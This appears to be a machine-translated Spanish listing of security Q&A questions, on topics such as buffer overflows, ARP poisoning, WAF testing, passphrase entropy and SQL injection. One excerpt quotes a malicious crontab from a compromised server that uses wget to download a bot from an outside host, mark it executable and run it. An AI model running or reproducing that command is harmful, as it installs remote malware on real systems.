Todas las preguntas

2
respuestas

¿Compilando un ejemplo de desbordamiento de búfer en Linux moderno?

Estoy tratando de compilar un ejemplo simple de desbordamiento de búfer en una máquina virtual Debian i386. El ejecutable construye bien, pero el EIP no se sobrescribe correctamente a pesar de que se le proporcionó una entrada suficientemente gr...
pregunta 15.09.2015 - 06:41
3
respuestas

Seguridad criptográfica de sales no aleatorias generadas dinámicamente

Entonces, cuando se trata de seguridad, cuando tengo una idea que parece buena, pero parece que nadie más lo está haciendo, trato de asumir que estoy pasando por alto algo obvio o significativo. Este es uno de esos casos ... El contexto de es...
pregunta 15.09.2011 - 15:16
5
respuestas

¿Se puede proteger el chat de Skype de la investigación? ¿Existen alternativas seguras?

Uso Skype un lote . Sin embargo, con todos mis clientes, personal, contratistas y amigos, la adquisición de por parte de Microsoft yo , ya que dos de mis clientes son competidores directos de EM, y a menudo trabajo en proyectos largos que está...
pregunta 17.04.2013 - 22:48
1
respuesta

¿El WiFi WPA2 está protegido contra el envenenamiento y la inhalación de ARP?

¿WPA2 WiFi está protegido contra el envenenamiento ARP? Si no, ¿puede el envenenador ARP descifrar los paquetes?     
pregunta 03.03.2011 - 18:34
2
respuestas

Al realizar un PenTest contra un sitio protegido por WAF, ¿qué debe saber un Pentester para mejorar la calidad de la prueba?

Estoy ejecutando un WAF en frente de un montón de aplicaciones web y tenemos las aplicaciones probadas con regularidad, y queremos mejorar nuestras pruebas presentando algún tipo de listas dinámicas a los evaluadores. ¿Qué información, desde Ser...
pregunta 09.07.2013 - 08:45
2
respuestas

¿Se requieren chips TPM o el equivalente para cumplir con el nivel de seguridad 1 de FIPS 140-2?

Un 'chip TPM' es:    un criptoprocesador seguro que puede almacenar claves criptográficas que   proteger información FIPS 140-2 requiere un módulo criptográfico, que puede ser hardware, software o ambos certificados. Si estuviera u...
pregunta 09.01.2012 - 16:56
2
respuestas

¿Cómo se puede construir y memorizar prácticamente una frase de contraseña con 256 bits de entropía?

Cotizando Wikipedia :    Una contraseña con, digamos, 42 bits de fuerza calculada de esta manera sería tan fuerte como una cadena de 42 bits elegidos al azar [.] Suponiendo que la interpretación es correcta, combinado con el conocimiento...
pregunta 29.06.2014 - 18:01
3
respuestas

¿Es SecureShellz bot un virus? ¿Como funciona?

Estoy usando un servidor de desarrollo en el que encontré esto en el crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/s...
pregunta 06.07.2012 - 09:08
0
respuestas

Potentes herramientas de seguridad para usar en pruebas de penetración

Quiero preguntarle acerca de algunas buenas herramientas de seguridad que ha usado o sobre las que ha escuchado, háganos saber la capacidad de cada herramienta y la dificultad para usarla y cuál es la mejor situación para usar esta herramienta....
pregunta 19.11.2010 - 12:23
2
respuestas

Inyección de SQL: Eliminar todas las tablas

Utilicé algunos escáneres de vulnerabilidades para verificar un sitio mío y se devolvió una instancia de inyección ciega de SQL. Sin embargo, cuando intento explotar esta vulnerabilidad al ingresar lo siguiente en la barra de direcciones, no suc...
pregunta 07.04.2013 - 15:34